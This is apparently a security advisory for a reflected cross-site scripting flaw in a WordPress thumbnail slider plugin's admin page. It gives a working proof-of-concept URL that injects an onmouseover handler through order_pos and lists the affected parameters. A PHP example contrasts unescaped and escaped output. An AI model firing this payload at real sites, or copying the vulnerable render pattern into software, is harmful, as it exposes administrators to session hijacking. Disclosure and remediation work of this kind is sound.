The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to a Reflected Cross-Site Scripting vulnerability which could be used against high-privilege users such as an admin.
Make a logged-in admin open:

GET /wp-admin/admin.php?page=responsive_thumbnail_slider_image_management&order_by=title&order_pos=uqxt1%22%20onmouseover%3dalert(1)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20cxz0m

Affected parameters: order_by, order_pos, and search_term
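The missing step, shown as an added example (not the plugin's own code): the same three parameters rendered without and with attribute-context escaping. The function names, the allowlist values, and the assumption that order_by and order_pos are a sort column and direction echoed into form attributes are hypothetical.

```php
<?php
// Added example, not the plugin's code. Assumption: the three parameters are
// echoed into HTML attribute values on the admin page.

// Hypothetical allowlists; the real column and direction names are not on the page.
const ALLOWED_ORDER_BY  = ['id', 'title', 'createdon'];
const ALLOWED_ORDER_POS = ['asc', 'desc'];

// Attribute-context escaping. Inside WordPress, esc_attr() does this job.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Return $value only if it is one of the expected tokens, else the default.
function pick($value, array $allowed, string $default): string
{
    return (is_string($value) && in_array($value, $allowed, true)) ? $value : $default;
}

// Vulnerable pattern: raw request value concatenated into an attribute.
function render_vulnerable(array $query): string
{
    $pos = $query['order_pos'] ?? '';
    return '<input type="hidden" name="order_pos" value="' . $pos . '">';
}

// Hardened pattern: allowlist the sort tokens, escape everything on output.
function render_hardened(array $query): string
{
    $by   = pick($query['order_by'] ?? null, ALLOWED_ORDER_BY, 'id');
    $pos  = pick($query['order_pos'] ?? null, ALLOWED_ORDER_POS, 'desc');
    $term = is_string($query['search_term'] ?? null) ? $query['search_term'] : '';

    return '<input type="hidden" name="order_by" value="' . attr($by) . '">'
         . '<input type="hidden" name="order_pos" value="' . attr($pos) . '">'
         . '<input type="text" name="search_term" value="' . attr($term) . '">';
}

// Constructed input: a double quote followed by an extra attribute.
// In the vulnerable form the quote closes value= early; in the hardened form
// order_pos is replaced by its default and the quote in search_term is encoded.
$query = ['order_by' => 'title', 'order_pos' => 'x" data-injected="1', 'search_term' => 'a"b'];
echo render_vulnerable($query), PHP_EOL;
echo render_hardened($query), PHP_EOL;
```

Allowlisting suits order_by and order_pos because they take a small fixed set of values; search_term is free text, so output escaping is its only control.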